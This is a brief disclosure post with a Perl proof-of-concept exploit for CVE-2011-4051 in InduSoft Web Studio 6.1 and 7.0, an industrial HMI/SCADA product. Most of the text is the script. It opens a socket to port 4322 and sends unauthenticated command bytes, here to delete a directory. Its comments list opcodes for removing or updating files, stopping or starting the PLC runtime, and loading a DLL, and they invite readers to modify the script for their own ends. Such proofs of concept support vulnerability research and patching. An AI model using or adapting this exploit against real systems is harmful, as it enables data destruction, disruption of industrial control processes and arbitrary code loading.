InduSoft Web Studio 6.1 and 7.0 allows unauthenticated users to run commands such as delete/create file, folder and load DLL.
Vulnerability was discovered by Luigi Auriemma
Here is a simple PoC for this vulnerability:
#PoC for CVE-2011-4051
#CEServer Module in InduSoft Web Studio 6.1 and 7.0 allows unauthenticated user to run commands.
#These are ; remove file/directory - send/update file - start/stop runtime project
#and Load DLL into WebStudio process.
#Modify the script to suit your needs.
#Vulnerability discovered by Luigi Auriemma
$host = "192.168.138.128";
$port = 4322;
$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || "Unable to create socket";
$start = "\x07";
$rmvfile = "\x15";
$rmvdir = "\x10";
$dlltag = "\x31";
#0x10 remove directory
#0x15 remove file
#0x01 update a file
#0x08 stop softplc runtime project
#0x07 start softplc runtime project
#0x31 run/load DLL
$data = "C:\\Python24";
$removedir = $rmvdir.$data;
print $sock $removedir;
print "\nOverflow request sent....";